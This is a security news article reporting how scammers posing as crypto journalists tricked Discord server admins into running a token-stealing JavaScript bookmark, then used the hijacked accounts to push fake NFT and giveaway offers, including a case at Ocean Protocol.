Cybercriminals hack the accounts of administrators of Discord servers and steal cryptocurrency from their accounts using malicious browser bookmarks.
Several Discord crypto communities have been affected in the recent wave of attacks, including Aura Network, MetrixCoin, and Nahmii.Let me remind you that we also talked about the fact that 17 malicious npm packages stole Discord tokens, and also that the PyPI repository got rid of 11 packages that were stealing Discord tokens and passwords.
And more recently, the media wrote that CAPTCHA in Discord Asks Users to Find Non-Existent Objects Created by AI.
Hackers usually target Discord communities where members discuss cryptocurrencies, but this time the attackers are attacking the admin accounts of those groups. According to Brian Krebs of KrebsOnSecurity, cybercriminals use accounts by executing malicious JavaScript code. To force users to execute the code, it masquerades as a seemingly innocuous browser bookmark.
Attackers use a deceptive strategy by inserting JavaScript into browser bookmarks using the drag and drop feature on web pages.
Group admins have reported receiving interview requests from individuals posing as reporters from cryptocurrency news outlets. Once the victims agree to be interviewed, they are redirected to a fake Discord server that mimics a news release.
Administrators are then asked to verify their identity by dragging a link from the server to the browser’s bookmarks bar. Victims believe this action is part of the verification process and subsequently return to Discord.com and click on a new bookmark.
What the victims didn’t know, however, was that the bookmark was a well-written piece of JavaScript code. The snippet stealthily extracts the victim’s Discord token and sends it to the attacker’s website.
The scammer then uploads the token into his browser session and proceeds to announce exclusive NFT news in the Discord target group, which are designed to attract naive participants who are confident in the legitimacy of the messages.
The victims are then prompted to connect their crypto wallets to the web address provided by the attacker and grant unlimited permissions to use their tokens. Consequently, the hacker successfully withdraws funds from compromised accounts. To cover their tracks, the attacker promptly deletes messages and bans users who are trying to expose fraud.
The stolen token remains functional only to the attacker until the original owner logs out or changes their credentials. This is how a cybercriminal can use a hacked account without arousing suspicion.
Brian Krebs
According to Krebs, an Ocean Protocol employee was the victim of this attack. On May 22, the Ocean Protocol Discord server admin clicked on a link sent in private messages from a community member. The administrator was then asked to verify their identity by dragging the link to the web browser’s bookmarks bar. Even though Multi-Factor Authentication (MFA) was enabled, the employee’s account was hacked.
The attackers waited until midnight in the victim’s time zone to use the account and reduce the chance of detection. Subsequently, the hackers from the hacked account sent a message announcing a new Ocean giveaway. Eventually, the victim contacted the operator of the server hosting the channel and the settings were returned to normal.
Discord admin accounts in cryptocurrency-focused communities have become a prime target for scammers using malicious JavaScript bookmarks. Attackers take advantage of the trust of Discord administrators by tricking them into executing code disguised as browser bookmarks.
With this deceptive strategy, the scammers gain access to victims’ Discord tokens, allowing them to perform fraudulent activities, such as debiting hacked accounts. It is extremely important for Discord users, especially administrators, to be careful about such attacks.
